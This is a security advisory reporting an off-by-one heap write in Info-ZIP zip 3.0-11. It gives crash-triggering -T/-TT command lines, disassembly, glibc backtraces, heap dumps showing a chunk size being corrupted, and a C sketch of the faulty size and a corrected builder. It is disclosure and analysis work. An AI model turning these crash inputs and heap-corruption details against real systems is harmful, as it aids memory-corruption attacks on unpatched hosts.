Info-Zip Zip 3.0-11 Crash

2018-07-09 / 2018-07-08
Credit: Sehun Oh
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Hello, I found a crash in Info-ZIP's zip command. The crash is caused by an off-by-one write on the heap. No malformed archive is needed; the crash is triggered by the command line alone. If the zip binary is wrapped by another program, I think this could become an exploitable vulnerability.

[ Environment ]
OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]
* Using the options -T and -TT.
* The vulnerability is caused by an off-by-one write.
: With -T and -TT, zip executes a Linux command to test the archive.
: To execute the command given with -T and -TT, zip stores it on the heap before calling system(); the stored data is built from the -TT argument and the archive name as follows (allocation size => command line => stored string):
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: The off-by-one write happens while the command string is being stored on the heap.
: It happens in the code below.

Disassembly -
.text:000000000040A052 mov rax, [rsp+48h+var_40]
.text:000000000040A057 mov word ptr [r15+rax+2], 27h

Hexray -
*(_WORD *)&v7[v16 + 2] = 0x27;

[ Error Msg ]
CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- die process

sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
(memory map omitted)
zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
(memory map omitted)

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- not die process

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========
(memory map omitted)
zip error: Interrupted (aborting)

[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: In this case malloc(0x18) is used.
: So the size field of the next chunk is overwritten with a null byte (off by one).

# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x616c662720414141
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

# Crash
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x6c66272041414141
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

# crash : before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x6c66272041414141
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one
                             ^ prev_size

# not crash : before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000251
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x0000000000000211
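The size arithmetic behind the crash, as an added illustration that is not Info-ZIP's code. The string layout `<cmd> '<archive>'` and the 0x18/0x38/0x58 allocations are taken from the report above; the length expression `strlen(cmd) + strlen(archive) + 3`, the glibc chunk-size model and all function names are my assumptions, chosen to reproduce those observed sizes. `nul_hits_next_chunk` shows why a request that is already a multiple of the allocator's granularity puts the stray terminator on the next chunk's header while a one-byte-shorter input lands harmlessly in slack, and `build_test_cmd` is the bounded builder that reserves room for the terminator.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Visible characters of "<cmd> '<archive>'", excluding the NUL. */
size_t cmd_strlen(const char *cmd, const char *archive)
{
    return strlen(cmd) + 2 + strlen(archive) + 1;
}

/* Assumed faulty size: reproduces the 0x18/0x38/0x58 allocations in the
 * report, but equals cmd_strlen(), so the terminating NUL has no room. */
size_t buggy_alloc_size(const char *cmd, const char *archive)
{
    return strlen(cmd) + strlen(archive) + 3;
}

/* Usable bytes glibc hands out for malloc(n) on x86_64 (assumed model:
 * request + 8 header bytes rounded up to 16, minimum chunk 32). */
size_t glibc_usable(size_t n)
{
    size_t chunk = (n + 8 + 15) & ~(size_t)15;
    if (chunk < 32)
        chunk = 32;
    return chunk - 8;
}

/* True when the stray NUL lands on the next chunk's header, as in the
 * crashing 12-'A' case; false when it falls into allocator slack, as in
 * the "Not Crash" dump above (11 'A's judging by its bytes). */
int nul_hits_next_chunk(const char *cmd, const char *archive)
{
    size_t n = buggy_alloc_size(cmd, archive);
    return n >= glibc_usable(n);
}

/* Corrected builder: size counts the terminator and snprintf is bounded,
 * so no -TT argument length can write past the buffer. Caller frees. */
char *build_test_cmd(const char *cmd, const char *archive)
{
    size_t size = cmd_strlen(cmd, archive) + 1;
    char *buf = malloc(size);
    if (buf == NULL)
        return NULL;
    int n = snprintf(buf, size, "%s '%s'", cmd, archive);
    if (n < 0 || (size_t)n >= size) {   /* error or truncation */
        free(buf);
        return NULL;
    }
    return buf;
}
```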


Copyright 2024, cxsecurity.com